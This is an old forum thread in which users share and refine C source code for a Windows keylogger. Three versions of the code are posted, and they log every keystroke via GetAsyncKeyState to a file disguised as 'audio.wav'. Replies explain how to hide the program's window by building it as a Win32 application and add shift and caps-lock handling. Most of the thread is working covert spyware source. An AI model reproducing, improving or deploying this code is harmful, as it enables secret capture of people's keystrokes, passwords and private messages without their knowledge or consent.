Articles
|
|
Guest0032
Jul 28 2005, 01:58 PM
Hey' ive been looking around for some keyloggers and i've got some tips from other sourcecodes and stuff, it's not really done. It can't really do much about record and save keys, can't send or anything, but still for you who got no clue here how I do it: CODE #include <stdio.h>
#include <windows.h>
#include <winuser.h>
#include <windowsx.h>
#include <ctime>
int get_keys(void);
int main(void)
{FILE *file;
file=fopen("audio.wav","a+");
time_t theTime=time(0);
fputs("\nStarted logging: ", file);
fputs(ctime(&theTime),file);
fclose(file);
get_keys();}
int get_keys(void)
{
short character;
while(1)
{
Sleep(8);
for(character=8;character<=200;character++)
{
if(GetAsyncKeyState(character)==-32767)
{
FILE *file;
file=fopen("audio.wav","a+");
if(file!=NULL)
{
if((character>=39)&&(character<91))
{fputc(character,file);
fclose(file);
break;}
else{switch(character)
{case VK_SPACE:
fputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
fputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
fputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
fputs("[CTRL]",file);
fclose(file);
break;
case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
fputs("[;:]",file);
fclose(file);
break;
case VK_OEM_2:
fputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
fputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
fputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
fputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
fputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
fputs("['\"]",file);
fclose(file);
break;
/*case VK_OEM_PLUS:
fputc('+',file);
fclose(file);
break;
case VK_OEM_COMMA:
fputc(',',file);
fclose(file);
break;
case VK_OEM_MINUS:
fputc('-',file);
fclose(file);
break;
case VK_OEM_PERIOD:
fputc('.',file);
fclose(file);
break;*/
case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",file);
fclose(file);
break;
default:
fclose(file);
break;}
}
}
}
}
}
return EXIT_SUCCESS;
}
Actually I got alot of help with the whole thing on how it saves, I kind of googled it and modified some. Oh and it also saves what time the keylogger started... Have fun and no flames please =)
NavyIT
Jul 28 2005, 06:37 PM
I'm not a C prrogrammer, but I wonder if having the file opened and closed after every non-alpha key wouldn't cause the program to hang, or at least be a resource hog? Also, what prevents the program from setting focus when a key is recorded? Just wondering.
Guest0032
Jul 28 2005, 09:06 PM
QUOTE(NavyIT @ Jul 28 2005, 06:37 PM) I'm not a C prrogrammer, but I wonder if having the file opened and closed after every non-alpha key wouldn't cause the program to hang, or at least be a resource hog? Also, what prevents the program from setting focus when a key is recorded? Just wondering. Well, it doesn't seem to hang and if you don't close it after you have used it it might get errors and ddestroy everything or so I've heard... And what prevents the program from not settings focus well I don't know, actually it doesn't seem to have a window or anything so I suppose there isn't anything to show the user... But hey, it works and it's simple =)
usch
Jul 28 2005, 09:55 PM
it will prolly pop up a console window.
try it with a windows application and don`t create a window. sorry i don't have source at the moment, but google for it.
usch
Guest0032
Jul 29 2005, 02:29 AM
yeah use it as a window application and it won't pop up =)
n.n.p
Jul 30 2005, 12:54 AM
I would really appreciate it if someone could tell me why this app works despite the fact it uses no keyboard hooking procedure or no external dll file.
I tested it and it seems to work fine, it pops up a console window but im sure that is easily remedied by creating it as a win32 app and just not show()ing the window.
Guest0032
Jul 30 2005, 02:19 AM
QUOTE(n.n.p @ Jul 30 2005, 12:54 AM) I would really appreciate it if someone could tell me why this app works despite the fact it uses no keyboard hooking procedure or no external dll file. I tested it and it seems to work fine, it pops up a console window but im sure that is easily remedied by creating it as a win32 app and just not show()ing the window. Hey just create it as a win32 file and no window will show up, you don't need to add anything...
usch
Jul 30 2005, 03:57 PM
i have modified the code a little bit with the mentioned windows method. CODE
#include <stdio.h>
#include <windows.h>
#include <winuser.h>
#include <windowsx.h>
#include <ctime>
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{FILE *file;
file=fopen("audio.wav","a+");
time_t theTime=time(0);
fputs("\nStarted logging: ", file);
fputs(ctime(&theTime),file);
fclose(file);
get_keys();}
int get_keys(void)
{
short character;
while(1)
{
Sleep(8);
for(character=8;character<=200;character++)
{
if(GetAsyncKeyState(character)==-32767)
{
FILE *file;
file=fopen("audio.wav","a+");
if(file!=NULL)
{
if((character>=39)&&(character<91))
{fputc(character,file);
fclose(file);
break;}
else{switch(character)
{case VK_SPACE:
fputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
fputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
fputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
fputs("[CTRL]",file);
fclose(file);
break;
case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
fputs("[;:]",file);
fclose(file);
break;
case VK_OEM_2:
fputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
fputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
fputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
fputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
fputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
fputs("['\"]",file);
fclose(file);
break;
/*case VK_OEM_PLUS:
fputc('+',file);
fclose(file);
break;
case VK_OEM_COMMA:
fputc(',',file);
fclose(file);
break;
case VK_OEM_MINUS:
fputc('-',file);
fclose(file);
break;
case VK_OEM_PERIOD:
fputc('.',file);
fclose(file);
break;*/
case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",file);
fclose(file);
break;
default:
fclose(file);
break;}
}
}
}
}
}
return EXIT_SUCCESS;
}
works fine for me without any window popping up. btw excellent job you've done on that. usch
cowsonfire
Jul 31 2005, 06:25 PM
QUOTE(Guest0032 @ Jul 28 2005, 09:06 PM) Well, it doesn't seem to hang and if you don't close it after you have used it it might get errors and ddestroy everything or so I've heard... ive never had that happen to me so ill take my chances ;) QUOTE(n.n.p @ Jul 30 2005, 12:54 AM) I would really appreciate it if someone could tell me why this app works despite the fact it uses no keyboard hooking procedure or no external dll file. I tested it and it seems to work fine, it pops up a console window but im sure that is easily remedied by creating it as a win32 app and just not show()ing the window. it works because it goes through a loop of the characters and calls GetAsyncKeyState for each one, telling it whether the key is pressed or not i was bored so i made it check the case for some of the input, also made it only open the file once... CODE #include <windows.h>
#include <stdio.h>
void get_keys(void);
FILE *file;
int WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nShow)
{
SYSTEMTIME st;
char start[256];
GetLocalTime(&st);
_snprintf(start, sizeof(start), "\n%.2d/%.2d/%4d, %.2d:%.2d %s: Started logging\n",st.wMonth,st.wDay,st.wYear,(st.wHour>12)?(st.wHour-12):(st.wHour),st.wMinute,(st.wHour>12)?("PM"):("AM"));
file=fopen("audio.wav","a+");
if (file!=NULL)
{
fputs(start, file);
fflush(file);
get_keys();
fclose(file);
}
return 0;
}
#define SHIFT_IS_DOWN() (GetKeyState(VK_SHIFT) < 0)
#define CAPS_IS_LOCKED() (GetKeyState(VK_CAPITAL) == 1)
void get_keys(void)
{
short character;
while(1)
{
Sleep(8);
for(character=0;character<255;character++)
{
if(GetAsyncKeyState(character)==-32767)
{
if (character>=65 && character<=90)
{
if ((!SHIFT_IS_DOWN() && !CAPS_IS_LOCKED()) ||
(SHIFT_IS_DOWN() && CAPS_IS_LOCKED())
)
character=tolower(character);
fputc(character,file);
break;
}
else if (character>=48 && character<=57)
{
switch (character)
{
case 48:
if (SHIFT_IS_DOWN()) fputc(')',file);
else fputc('0',file);
break;
case 49:
if (SHIFT_IS_DOWN()) fputc('!',file);
else fputc('1',file);
break;
case 50:
if (SHIFT_IS_DOWN()) fputc('@',file);
else fputc('2',file);
break;
case 51:
if (SHIFT_IS_DOWN()) fputc('#',file);
else fputc('3',file);
break;
case 52:
if (SHIFT_IS_DOWN()) fputc('$',file);
else fputc('4',file);
break;
case 53:
if (SHIFT_IS_DOWN()) fputc('%',file);
else fputc('5',file);
break;
case 54:
if (SHIFT_IS_DOWN()) fputc('^',file);
else fputc('6',file);
break;
case 55:
if (SHIFT_IS_DOWN()) fputc('&',file);
else fputc('7',file);
break;
case 56:
if (SHIFT_IS_DOWN()) fputc('*',file);
else fputc('8',file);
break;
case 57:
if (SHIFT_IS_DOWN()) fputc('(',file);
else fputc('9',file);
break;
}
}
else
{
switch(character)
{
case VK_TAB:
fputs("[TAB]",file);
break;
case VK_RETURN:
fputs("[RETURN]",file);
break;
case VK_SHIFT:
// fputs("[SHIFT]",file);
break;
case VK_LSHIFT:
fputs("[LSHIFT]",file);
break;
case VK_RSHIFT:
fputs("[RSHIFT]",file);
break;
case VK_CONTROL:
// fputs("[CTRL]",file);
break;
case VK_LCONTROL:
fputs("[LCTRL]",file);
break;
case VK_RCONTROL:
fputs("[RCTRL]",file);
break;
case VK_MENU:
// fputs("[ALT]",file);
break;
case VK_LMENU:
fputs("[LALT]",file);
break;
case VK_RMENU:
fputs("[RALT]",file);
break;
case VK_PAUSE:
fputs("[PAUSE]",file);
break;
case VK_CAPITAL:
fputs("[CAPS]",file);
break;
case VK_ESCAPE:
fputs("[ESC]",file);
break;
case VK_SPACE:
fputc(' ',file);
break;
case VK_PRIOR:
fputs("[PGUP]",file);
break;
case VK_NEXT:
fputs("[PGDOWN]",file);
break;
case VK_END:
fputs("[END]",file);
break;
case VK_HOME:
fputs("[HOME]",file);
break;
case VK_LEFT:
fputs("[LEFT]",file);
break;
case VK_UP:
fputs("[UP]",file);
break;
case VK_RIGHT:
fputs("[RIGHT]",file);
break;
case VK_DOWN:
fputs("[DOWN]",file);
break;
case VK_SNAPSHOT:
fputs("[PRTSCR]",file);
break;
case VK_INSERT:
fputs("[INSERT]",file);
break;
case VK_DELETE:
fputs("[DEL]",file);
break;
case VK_LWIN:
fputs("[LWIN]",file);
break;
case VK_RWIN:
fputs("[RWIN]",file);
break;
case VK_NUMPAD0:
fputc('0',file);
break;
case VK_NUMPAD1:
fputc('1',file);
break;
case VK_NUMPAD2:
fputc('2',file);
break;
case VK_NUMPAD3:
fputc('3',file);
break;
case VK_NUMPAD4:
fputc('4',file);
break;
case VK_NUMPAD5:
fputc('5',file);
break;
case VK_NUMPAD6:
fputc('6',file);
break;
case VK_NUMPAD7:
fputc('7',file);
break;
case VK_NUMPAD8:
fputc('8',file);
break;
case VK_NUMPAD9:
fputc('9',file);
break;
case VK_MULTIPLY:
fputc('*',file);
break;
case VK_ADD:
fputc('+',file);
break;
case VK_SUBTRACT:
fputc('-',file);
break;
case VK_DECIMAL:
fputc('.',file);
break;
case VK_DIVIDE:
fputc('/',file);
break;
case VK_F1:
fputs("[F1]",file);
break;
case VK_F2:
fputs("[F2]",file);
break;
case VK_F3:
fputs("[F3]",file);
break;
case VK_F4:
fputs("[F4]",file);
break;
case VK_F5:
fputs("[F5]",file);
break;
case VK_F6:
fputs("[F6]",file);
break;
case VK_F7:
fputs("[F7]",file);
break;
case VK_F8:
fputs("[F8]",file);
break;
case VK_F9:
fputs("[F9]",file);
break;
case VK_F10:
fputs("[F10]",file);
break;
case VK_F11:
fputs("[F11]",file);
break;
case VK_F12:
fputs("[F12]",file);
break;
case VK_NUMLOCK:
fputs("[NUMLOCK]",file);
break;
case VK_SCROLL:
fputs("[SCROLL]",file);
break;
case VK_OEM_1:
if (SHIFT_IS_DOWN()) fputc(':',file);
else fputc(';',file);
break;
case VK_OEM_PLUS:
if (SHIFT_IS_DOWN()) fputc('+',file);
else fputc('=',file);
break;
case VK_OEM_COMMA:
if (SHIFT_IS_DOWN()) fputc('<',file);
else fputc(',',file);
break;
case VK_OEM_MINUS:
if (SHIFT_IS_DOWN()) fputc('_',file);
else fputc('-',file);
break;
case VK_OEM_PERIOD:
if (SHIFT_IS_DOWN()) fputc('>',file);
else fputc('.',file);
break;
case VK_OEM_2:
if (SHIFT_IS_DOWN()) fputc('?',file);
else fputc('/',file);
break;
case VK_OEM_3:
if (SHIFT_IS_DOWN()) fputc('~',file);
else fputc('`',file);
break;
case VK_OEM_4:
if (SHIFT_IS_DOWN()) fputc('{',file);
else fputc('[',file);
break;
case VK_OEM_5:
if (SHIFT_IS_DOWN()) fputc('|',file);
else fputc('\\',file);
break;
case VK_OEM_6:
if (SHIFT_IS_DOWN()) fputc('}',file);
else fputc(']',file);
break;
case VK_OEM_7:
if (SHIFT_IS_DOWN()) fputc('"',file);
else fputc('\'',file);
break;
default:
break;
}
fflush(file);
}
}
}
}
fclose(file);
return;
}
Guest0032
Jul 31 2005, 08:49 PM
Nice done guys, and good idea with the Low and High character thing
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
|
